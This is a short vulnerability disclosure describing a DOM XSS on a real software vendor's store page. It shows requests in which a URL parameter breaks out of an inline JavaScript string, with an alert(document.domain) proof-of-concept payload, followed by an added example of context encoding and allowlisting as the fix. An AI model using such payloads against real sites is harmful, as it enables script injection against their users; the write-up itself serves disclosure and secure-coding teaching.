Bandicam DOM XSS

Learn System Security - Bandicam DOM XSS ~


Reproduction Steps:
Step #1 When we open the page https://www.bandicam.com/store/buynow2.php?product=BDCAM, we get source code like this:

<script type="text/javascript" >
    //if(document.getElementsByName('PP_BUYEREMAIL1')[0].value == "e.g.) [email protected]")
    {
        //document.getElementsByName('PP_LICENSE')[0].value = 'BDCAM-1';
        $('#quantity').val('');
        changeLicense();   
        //document.getElementsByName('PP_PAYTYPE')[0].value = '
BDCAM-1';       
        $('#method').val('');       
    }
</script>


Step #2
Request:
https://www.bandicam.com/store/buynow2.php?product=test'

Response:
<script type="text/javascript" >
    //if(document.getElementsByName('PP_BUYEREMAIL1')[0].value == "e.g.) [email protected]")
    {
        //document.getElementsByName('PP_LICENSE')[0].value = '
test'-1';
        $('#quantity').val('');
        changeLicense();   
        //document.getElementsByName('PP_PAYTYPE')[0].value = 'test'-1';       
        $('#method').val('');       
    }
</script>


Step #3
Request:
https://www.bandicam.com/store/buynow2.php?product=test');}alert(document.domain);{//

Response:
<script type="text/javascript" >
    //if(document.getElementsByName('PP_BUYEREMAIL1')[0].value == "e.g.) [email protected]")
    {
        //document.getElementsByName('PP_LICENSE')[0].value = '
');}alert(document.domain);{//-1';
        $('#quantity').val('');
        changeLicense();   
        //document.getElementsByName('PP_PAYTYPE')[0].value = '');}alert(document.domain);{//-1';       
        $('#method').val('');       
    }
</script>
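
The steps above depend on the `product` parameter being concatenated into a quoted JavaScript string; the fix is to encode it for that context and to allowlist the parameter. The following is an added example, not code from the original post or from Bandicam: the inline-script template, the `#license` selector, the `store.example` domain and the product-code pattern are assumptions, and the inputs are the three `product` values from the steps. It runs under Node with stubs in place of jQuery and the browser.

```javascript
// Constructed stand-in for the store page's inline script (assumption:
// the real template is only partly visible in the responses above).
function renderVulnerable(product) {
  // Raw concatenation into a single-quoted JS string literal.
  return "{\n  $('#license').val('" + product + "-1');\n  changeLicense();\n}";
}

// Encode a value as a JS string literal that is also safe inside <script>:
// JSON.stringify escapes quotes, backslashes and newlines; the replace()
// covers "<", ">", "&" and the U+2028/U+2029 line separators.
function jsLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderEncoded(product) {
  return "{\n  $('#license').val(" + jsLiteral(product + "-1") + ");\n  changeLicense();\n}";
}

// Second layer: allowlist the parameter (assumed product-code shape).
function isValidProduct(product) {
  return /^[A-Za-z0-9_-]{1,32}$/.test(product);
}

// Evaluate a rendered script against stubs and record what it did.
function run(script) {
  const seen = { alerts: [], values: [], error: null };
  const $ = () => ({ val: (v) => seen.values.push(v) });
  try {
    new Function("$", "changeLicense", "alert", "document", script)(
      $, () => {}, (m) => seen.alerts.push(m), { domain: "store.example" });
  } catch (e) {
    seen.error = e.name; // e.g. SyntaxError from an unbalanced quote
  }
  return seen;
}

// The three product values used in the steps above.
const samples = ["BDCAM", "test'", "test');}alert(document.domain);{//"];
for (const p of samples) {
  console.log(JSON.stringify(p), "valid:", isValidProduct(p),
    "raw:", run(renderVulnerable(p)), "encoded:", run(renderEncoded(p)));
}
```

With raw concatenation the single quote from Step #2 breaks the script and the Step #3 value reaches the stubbed `alert`; with encoding, both arrive at `.val()` as inert strings.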


Thank you, happy bug hunting.